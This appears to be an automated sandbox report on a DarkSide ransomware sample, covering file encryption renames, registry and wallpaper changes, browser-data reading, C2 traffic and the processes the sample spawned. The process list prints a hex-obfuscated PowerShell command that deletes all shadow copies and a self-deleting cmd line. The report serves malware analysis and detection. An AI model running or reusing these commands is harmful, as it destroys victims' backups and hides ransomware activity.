Malware Analysis Report

2024-10-16 03:30

Sample ID 220210-nx72qahabm
Target 43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa
SHA256 43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa
Tags
darkside ransomware spyware stealer suricata
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa

Threat Level: Known bad

The file 43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa was found to be: Known bad.

Malicious Activity Summary

darkside ransomware spyware stealer suricata

suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

DarkSide

Modifies extensions of user files

Reads user/profile data of web browsers

Checks computer location settings

Deletes itself

Sets desktop wallpaper using registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Enumerates physical storage devices

Checks processor information in registry

Modifies registry class

Modifies Control Panel

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-10 11:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-10 11:47

Reported

2022-02-10 11:50

Platform

win7-en-20211208

Max time kernel

117s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

Signatures

DarkSide

ransomware darkside

suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

suricata

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\SkipDeny.crw => C:\Users\Admin\Pictures\SkipDeny.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\SkipDeny.crw.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeApprove.png => C:\Users\Admin\Pictures\ResumeApprove.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeApprove.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeDisable.png => C:\Users\Admin\Pictures\ResumeDisable.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeDisable.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\SaveSplit.png => C:\Users\Admin\Pictures\SaveSplit.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\SaveSplit.png.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\27a6f0b5.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\27a6f0b5.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5\ = "27a6f0b5" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\27a6f0b5.ico" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe
PID 1680 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\43E615~1.EXE >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 securebestapp20.com udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 www.microsoft.com udp

Files

memory/1680-55-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

memory/1988-56-0x000007FEFB731000-0x000007FEFB733000-memory.dmp

memory/1988-59-0x00000000024D0000-0x00000000024D2000-memory.dmp

memory/1988-60-0x00000000024D2000-0x00000000024D4000-memory.dmp

memory/1988-61-0x00000000024D4000-0x00000000024D7000-memory.dmp

memory/1988-58-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

memory/1988-57-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

memory/1988-62-0x000000001B750000-0x000000001BA4F000-memory.dmp

memory/1988-63-0x00000000024DB000-0x00000000024FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

